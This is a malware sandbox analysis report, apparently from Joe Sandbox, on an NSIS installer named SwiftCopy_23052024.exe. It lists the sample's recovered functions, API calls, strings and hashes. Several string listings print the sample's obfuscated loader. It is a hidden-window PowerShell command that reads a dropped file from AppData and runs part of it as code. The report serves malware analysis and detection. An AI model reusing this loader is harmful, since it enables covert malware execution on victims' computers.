"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", xrefs: 004035FA
Error launching installer, xrefs: 0040351F
~nsu, xrefs: 00403593
", xrefs: 0040337B
C:\Users\user\Desktop\SwiftCopy_23052024.exe, xrefs: 00403645

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"$"C:\Users\user\Desktop\SwiftCopy_23052024.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\fertiliseringer$C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes$C:\Users\user\Desktop$C:\Users\user\Desktop\SwiftCopy_23052024.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Trvlemund Setup$UXTHEME$\Temp$~nsu
API String ID: 3776617018-3123222245
Opcode ID: 8aa4df41946adec8f439698abe0bc5b5c2b2cb54fc2c5969439c95f62d2e2783
Instruction ID: 4b1384cee9ffc8e7d3909f75f513e580ba658b4e0f6039b9d7a5280b54d142a8
Opcode Fuzzy Hash: 8aa4df41946adec8f439698abe0bc5b5c2b2cb54fc2c5969439c95f62d2e2783
Instruction Fuzzy Hash: B3C1E870104741AAD7216F759D89A2F3FA8AB86306F05453FF581B61E2CB7C8A15CB2E

Function 00405252 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004052B1
GetDlgItem.USER32(?,000003EE), ref: 004052C0
GetClientRect.USER32(?,?), ref: 004052FD
GetSystemMetrics.USER32(00000002), ref: 00405304
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 004053A0
GetDlgItem.USER32(?,000003EC), ref: 004053C1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
GetDlgItem.USER32(?,000003F8), ref: 004052CF

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

GetDlgItem.USER32(?,000003EC), ref: 00405412
CreateThread.KERNELBASE(00000000,00000000,Function_000051E6,00000000), ref: 00405420
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405427
ShowWindow.USER32(00000000), ref: 0040544A
ShowWindow.USER32(?,00000008), ref: 00405451
ShowWindow.USER32(00000008), ref: 00405497
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
CreatePopupMenu.USER32 ref: 004054DC
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054F1
GetWindowRect.USER32(?,000000FF), ref: 00405511
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
OpenClipboard.USER32(00000000), ref: 00405576
EmptyClipboard.USER32 ref: 0040557C
GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
GlobalLock.KERNEL32(00000000), ref: 0040558F
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
GlobalUnlock.KERNEL32(00000000), ref: 004055BC
SetClipboardData.USER32(00000001,00000000), ref: 004055C7
CloseClipboard.USER32 ref: 004055CD

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID:
API String ID: 4154960007-0
Opcode ID: 7d6975a136f345aa56febd8a3ded24ee0254d98c353b74a79df9c86b7c2f74b7
Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
Opcode Fuzzy Hash: 7d6975a136f345aa56febd8a3ded24ee0254d98c353b74a79df9c86b7c2f74b7
Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

Function 004062F0 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(771B3410,007A0D98,007A0950,00405AB6,007A0950,007A0950,00000000,007A0950,007A0950,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004057D5,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 004062FB
FindClose.KERNEL32(00000000), ref: 00406307

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
Instruction ID: 3919553d01c23f7351ed85dbc682ed8077fcf54d37e588a2b2de2e61cdf0a9ad
Opcode Fuzzy Hash: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
Instruction Fuzzy Hash: 14D012325451205BC75017786E0C88B7A589F963717214B36F9AAF61E0CB748C238AD8

Function 00403BA7 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
ShowWindow.USER32(?), ref: 00403C00
DestroyWindow.USER32 ref: 00403C14
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
GetDlgItem.USER32(?,?), ref: 00403C51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
IsWindowEnabled.USER32(00000000), ref: 00403C6C
GetDlgItem.USER32(?,00000001), ref: 00403D1A
GetDlgItem.USER32(?,00000002), ref: 00403D24
SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D8F
GetDlgItem.USER32(?,00000003), ref: 00403E35
ShowWindow.USER32(00000000,?), ref: 00403E56
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E68
EnableWindow.USER32(?,?), ref: 00403E83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E99
EnableMenuItem.USER32(00000000), ref: 00403EA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
SetWindowTextA.USER32(?,0079F548), ref: 00403F04
ShowWindow.USER32(?,0000000A), ref: 00404038

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 5cb6db4a61d9182de01f1cc090190335aa4758ada151b98f13a0767069bdfa93
Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
Opcode Fuzzy Hash: 5cb6db4a61d9182de01f1cc090190335aa4758ada151b98f13a0767069bdfa93
Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

Function 0040380A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

lstrcatA.KERNEL32(1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",00000000), ref: 00403885
lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\fertiliseringer,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,771B3410), ref: 004038FA
lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
GetFileAttributesA.KERNEL32(Execute: ), ref: 00403918
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\fertiliseringer), ref: 00403961

Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58

RegisterClassA.USER32(007A26E0), ref: 0040399E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
ShowWindow.USER32(00000005,00000000), ref: 00403A21
GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
RegisterClassA.USER32(007A26E0), ref: 00403A63
DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82

Strings

"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 0040380E
RichEd32, xrefs: 00403A35
.DEFAULT\Control Panel\International, xrefs: 00403870
_Nb, xrefs: 0040397D, 004039E5
Control Panel\Desktop\ResourceLocale, xrefs: 0040383E
.exe, xrefs: 00403907
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040380F
RichEd20, xrefs: 00403A27
RichEdit, xrefs: 00403A54
1033, xrefs: 0040382A, 00403880
RichEdit20A, xrefs: 00403A45, 00403A4B
&z, xrefs: 00403970
Execute: , xrefs: 004038C8, 004038D0, 004038DD, 00403927, 0040392D
C:\Users\user\AppData\Roaming\fertiliseringer, xrefs: 00403894, 0040389C, 00403934, 0040393A, 0040394A

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\SwiftCopy_23052024.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\fertiliseringer$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
API String ID: 1975747703-3271642562
Opcode ID: ececd438e1c6f1532b783911c6f9371f09af6f1f7a3755b1880a4f7a2e843da9
Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
Opcode Fuzzy Hash: ececd438e1c6f1532b783911c6f9371f09af6f1f7a3755b1880a4f7a2e843da9
Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DD5
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SwiftCopy_23052024.exe,00000400), ref: 00402DF1

Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 00405B8A
Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SwiftCopy_23052024.exe,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 00402E3D
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73

Strings

C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
Null, xrefs: 00402EBB
"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 00402DC4
soft, xrefs: 00402EB2
Inst, xrefs: 00402EA9
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402DCB
Error launching installer, xrefs: 00402E14
C:\Users\user\Desktop\SwiftCopy_23052024.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\SwiftCopy_23052024.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SwiftCopy_23052024.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2122206717
Opcode ID: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
Instruction ID: 59d678f17646e0847602a4e6c91a81595dbc35b8f9b1ca6258d7792959114811
Opcode Fuzzy Hash: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
Instruction Fuzzy Hash: 0F510971900216AFDB109F64CE89B9E7BB8EB55355F10403BF904B62C1C7BC9E81AB5D

Function 0040600F Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Execute: ,00000400), ref: 0040613A
GetWindowsDirectoryA.KERNEL32(Execute: ,00000400,?,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,0040514C,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000), ref: 0040614D
SHGetSpecialFolderLocation.SHELL32(0040514C,771B23A0,?,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,0040514C,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000), ref: 00406189
SHGetPathFromIDListA.SHELL32(771B23A0,Execute: ), ref: 00406197
CoTaskMemFree.OLE32(771B23A0), ref: 004061A3
lstrcatA.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
lstrlenA.KERNEL32(Execute: ,?,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,0040514C,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,00000000,007969E3,771B23A0), ref: 00406219

Strings

Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg, xrefs: 00406034
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004061C1
Execute: , xrefs: 00406039, 00406106, 00406107, 00406108, 00406124, 00406139, 0040614C, 00406168, 00406193, 004061C6, 004061CC, 004061E4, 004061F7, 00406212, 00406218, 00406220, 0040624A
"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", xrefs: 004061F1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406109

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
